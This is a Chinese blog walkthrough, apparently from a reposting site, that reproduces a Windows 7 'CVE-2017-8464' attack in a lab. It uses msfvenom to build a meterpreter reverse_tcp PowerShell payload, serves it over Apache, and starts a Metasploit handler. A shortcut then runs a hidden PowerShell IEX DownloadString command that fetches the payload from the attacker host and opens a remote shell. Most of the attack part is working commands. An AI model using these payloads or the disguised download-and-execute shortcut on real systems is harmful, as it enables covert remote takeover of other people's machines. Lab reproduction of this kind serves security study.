欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

CVE-2017-8464 远程命令执行漏洞复现

程序员文章站 2022-03-24 08:37:10
...

漏洞编号:CVE2017-8464
服务器版本:Windows 7 专业版
攻击工具:metasploit
靶机IP:192.168.1.198
攻击机IP:192.168.1.187(kali)
漏洞复现原理:创建包含恶意执行脚本的快捷方式并且运行,致使本机中毒。

运行kali,在终端中生成一个反弹shell,执行:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.187   LPORT=5555 -f psh-reflection>/opt/search.ps1

如果目标机是64位主机执行:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.187   LPORT=5555 -f psh-reflection>/opt/search.ps1

CVE-2017-8464 远程命令执行漏洞复现
进入到【/opt】目录下,查看文件“search.ps1”是否创建成功
CVE-2017-8464 远程命令执行漏洞复现
将创建的“search.ps1”文件copy到【/var/www/html】目录下
CVE-2017-8464 远程命令执行漏洞复现
启动Apache服务器
CVE-2017-8464 远程命令执行漏洞复现
网页访问http://192.168.1.187/search.ps1,查看是否成功
CVE-2017-8464 远程命令执行漏洞复现
在kali下面启动MSF软件输入命令
CVE-2017-8464 远程命令执行漏洞复现
输入命令进入【handler】use exploit/multi/handler
指定本机IP 【LHOST】
指定端口【LPORT】
设置返回载荷 set payload windows/x64/meterpreter/reverse_tcp
运行
CVE-2017-8464 远程命令执行漏洞复现
在目标机中创建快捷键,在对象的位置中输入:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.187/search.ps1');test.ps1"

然后点击下一步,快捷名称命名为:powershell.exe(默认的powershell.exe)
CVE-2017-8464 远程命令执行漏洞复现
运行快捷方式,回到kali攻击机中,如果msf从监听模式变成如下形式,表示已经获取目标机shell
CVE-2017-8464 远程命令执行漏洞复现
执行ls命令,可以发现所列出的文件在目标机的C盘下
CVE-2017-8464 远程命令执行漏洞复现
执行shell命令,进入靶机,就可以执行cmd命令了(此处已经是管理员权限,故而不在进行提权)
CVE-2017-8464 远程命令执行漏洞复现

相关标签: Metasploit